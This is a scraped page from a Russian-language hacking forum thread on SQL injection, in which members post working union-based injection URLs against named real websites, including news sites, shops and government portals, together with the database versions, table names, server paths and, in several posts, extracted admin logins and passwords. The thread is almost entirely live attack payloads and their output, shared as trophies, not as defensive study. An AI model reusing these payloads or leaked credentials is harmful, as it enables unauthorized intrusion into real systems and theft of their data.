SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    nikvesti.com
    Code:
    http://www.nikvesti.com/news.php?id=-2446+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16+--+
    Version: 5.0.67-community-nt
    Database:nikvesti
    User: root@localhost

    Таблицы:
    Code:
    http://www.nikvesti.com/news.php?id=-2446+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+0,1+--+
     
    #10641 Sams, 16 Sep 2009
    Last edited: 16 Sep 2009
    2 people like this.
  2. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Code:
    http://www.fozzy.ua/?page=newsdetails&newsID=179 and 1=0 union select 1,2,3,4,concat_ws('::',unhex(hex(database())),unhex(hex(user())),unhex(hex(version()))),6,7,8,9,1,2,3 --&lastPage=contentview
    Жаль, но мускул версии 4.1.14
    Есть таблица: login

    Code:
    http://korm.com.ua/?pid=6&oid=81%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws%28%27::%27,database%28%29,user%28%29,version%28%29%29%20from%20information_schema.tables--
    Ну а здесь все просто и понятно))) + админка в стандартной директории: /admin
     
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Оо 6 ветка, первый раз вижу
    version:6.0.10-alpha-community-log
    user: aos_new@localhost
    database: aos_new


    http://aos.com.ua/index.php?teg=2&task=-4+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--
     
    _________________________
    5 people like this.
  4. ph4nt0m

    ph4nt0m Member

    Joined:
    10 Aug 2009
    Messages:
    11
    Likes Received:
    15
    Reputations:
    0
    http://fdp-koeln.de/

    http://www.fdp-koeln.de/printpage.php?tid=-3101+union+select+1,2,3,4,5,USER(),DATABASE(),VERSION(),9,11,12,13/*

    sportal-web29@localhost
    Ort: sportal_web29
    Veranstalter: 5.0.22

    http://www.fdp-koeln.de/printpage.php?tid=-3101+union+select+1,2,3,4,5,USER(),DATABASE(),COLUMN_NAME,9,11,12,13+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x616b7475656c6c6573+LIMIT+0,1/*
     
  5. ph4nt0m

    ph4nt0m Member

    Joined:
    10 Aug 2009
    Messages:
    11
    Likes Received:
    15
    Reputations:
    0
    http://eleview.com/

    http://support.eleview.com/message_box.php?theme=&l=flamingo&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
     
    #10645 ph4nt0m, 16 Sep 2009
    Last edited by a moderator: 16 Sep 2009
    3 people like this.
  6. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    cutieplay.com - PR=1
    http://www.cutieplay.com/game.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLECT/**/1,2,conCat_ws(cHaR(42,42,42),user(),database(),version()),4,5,6,7,8,9
    user - [email protected]
    database - cutieplay_db
    version - 5.0.67-log


    splashworks.com
    http://www.splashworks.com/game.php?id=1/**/anD/**/substring(version(),1,1)=3/*
    ветка - 3
     
    6 people like this.
  7. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    ....
     
    #10647 Sams, 16 Sep 2009
    Last edited: 16 Sep 2009
    5 people like this.
  8. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    henrilloyd.com pr5
    Магаз какого-то пафосного хмыря :D
    Code:
    [COLOR=SlateGray]http://www.henrilloyd.com/news_open.asp?news_id=null'+union+all+select+null,null,concat_ws(0x2f,version(),user(),database()),null,null,null,null,null,null,null,null+--+
    http://www.henrilloyd.com/news_open.asp?news_id=null'+union+all+select+null,null,concat_ws(0x2f,user_email,user_password),null,null,null,null,null,null,null,null+from+users+limit+0,1+--+[/COLOR]
    4.0.22-standard/hl_2007_a@localhost/hl_2007_a
    [email protected]/nimda
     
    7 people like this.
  9. ph4nt0m

    ph4nt0m Member

    Joined:
    10 Aug 2009
    Messages:
    11
    Likes Received:
    15
    Reputations:
    0
    http://www.ghcc.com Pr4


    http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+VERSION(),2,3,DATABASE(),5,6,USER(),8,9,11--

    ghc@localhost
    db_hall_chamber
    5.0.24-community-nt


    http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+@@tmpdir,@@version_compile_os,3,@@datadir,5,6,@@basedir,8,9,11%20--


    C:\Program Files\MySQL\MySQL Server 5.0\
    C:\Program Files\MySQL\MySQL Server 5.0\Data\ More Info
    C:\WINDOWS\TEMP\
    Win32



    http://www.ghcc.com/news/news_details.asp?news_id=-990+union+select+VERSION(),2,3,DATABASE(),5,6,TABLE_NAME,8,9,11%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1%20-- :

     
    1 person likes this.
  10. cremator (c)

    cremator (c) Elder - Старейшина

    Joined:
    20 Jun 2008
    Messages:
    258
    Likes Received:
    72
    Reputations:
    0
    Code:
    [COLOR=Green]http://www.kvazar.ru/price_new.htm?group_id=42&div=atrade&parent_group_id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--[/COLOR]
    Database Version: 5.0.51a-community
    Database name: db_kvazar1
    User name: kvazar1@localhost


    Code:
    [COLOR=Green]http://jogharta.com/produit.php?id=2+UNION+SELECT+1,concat_ws(0x3a,Version(),database(),user()),3,4+LIMIT+1,1[/COLOR]
    Database Version: 5.0.44-log
    Database name: jogharta
    User name: jogharta@localhost


    Code:
    [COLOR=Green]http://oms.hec.gov.pk/?comp=newsletter_display.php&id=12+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,Version(),database(),user()),7,8,9,10,11,12[/COLOR]
    Database Version: 5.0.22
    Database name: HEC_OMS
    User name: oms@localhost


    Code:
    [COLOR=Green]http://www.langsfordcenter.com/our-result.php?id=-18+union+select+1,2,concat_ws(0x3a,Version(),database(),user())[/COLOR]
    Database Version: 5.0.81-community-log
    Database name: langsfor_langsfor
    User name: langsfor_langsdb@localhost

    PR=4


    Code:
    http://www.conservativetruth.org/article.php?id=5+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Blind-SQLINJ
     
    3 people like this.
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.sportformen.com/post.php?id_post=-1830+union+select+concat_ws(0x3a3a,name,surname,login,password,stat),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users+limit+2,1+/*+

    PR4
    http://www.opperaa.com/lista/listaEditoria.php?editoria_id_editoria=-2+union+select+1,2,3,4,concat_ws

    (0x3a3a,idusuario,nome,senha,funcao,email),6,7,8,9,10,11,12,13,14,15+from+usuario+--+

    http://www.mondobhz.com.br/lista/noticias.php?editoria_id_editoria=-2+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+--+

    Pr7
    http://casadachris.uol.com.br/blog/?id=-876'+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+

    pr5
    http://sepultura.uol.com.br/a-lex/post.php?id_post=-13'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+/*+

    http://www.gmfcpfd.org/member.php?memid=-16+uNiOn+sElEcT+tAbLe_NaMe+from+information_schema.tables+--+
     
    5 people like this.
  12. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    386
    Reputations:
    58
    Code:
    http://www.hutchrec.com/rec_page.php?id=-12+union+select+username,2,3,4+from+admin--
    Database Version: 5.0.81-community
    Database name: hutchrec_834957sdfk
    User name: hutchrec_huzKSDF@localhost
     
    3 people like this.
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.teko.ca/crew.php?id=-1+union+select+1,2,3,4,5,6,7
    Database Version: 5.0.67-userstats-log
    Database name: teko
    User name: [email protected]

    Code:
    http://www.teko.ca/crew.php?id=-1+union+select+1,concat_ws(0x3a,id,name,pass),3,4,5,6,7+from+board.accounts
    Code:
    1:Alex:{jvz}wuuq
     
    #10653 mailbrush, 16 Sep 2009
    Last edited: 16 Sep 2009
    3 people like this.
  14. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.e-proector.ru/info1.php?fi=-11+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9--
    
    ollrosa_e@localhost:5.0.44-log:eek:llrosa_e
    Code:
    http://www.e-proector.ru/info1.php?fi=-11+union+select+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables--
    
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    anons
    indeks
    inform
    menu
    
     
    4 people like this.
  15. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8

    4.1.22-community-ntboacoisa_boacoisaboaco_boacoisa@zeus.masterbizwi n.com.br
     
    #10655 Swift, 16 Sep 2009
    Last edited: 17 Sep 2009
    4 people like this.
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://wanning.hainan.gov.cn/v6/news/file.php?id=-1+union+select+1,2,3,4,5,6,7,8,9
    Code:
    Database Version: 5.0.77-builded by Wang Xianren-log
    Database name: wanning
    User name: wanning@localhost
     
    6 people like this.
  17. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    brainmelt.com -
    http://www.brainmelt.com/game.php?id=1+anD+1=7%20+uniON+all+seLECT+1,2,conCAt_wS(ChAR(42,42,42),user(),database(),version()),4,5,6,7,8,9,10,11,12,13/*
    user - [email protected]
    database - db109168799
    version - 4.0.27-max-log


    http://www.evilcountry.com/game.php?ID=1/**/aNd/**/substring(version(),1,1)=5/*
    ветка - 5
     
    5 people like this.
  18. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Washington State Institute for Public Policy

    Code:
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) 
     
    5 people like this.
  19. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://mgz.com.ua/catalog.php?category=-4+union+select+1,version(),3--&subcat=67

    5.0.81-community-log
     
    _________________________
    7 people like this.
  20. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Software security

    PostgreSQL 8.3.3 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
     
    3 people like this.
Thread Status:
Not open for further replies.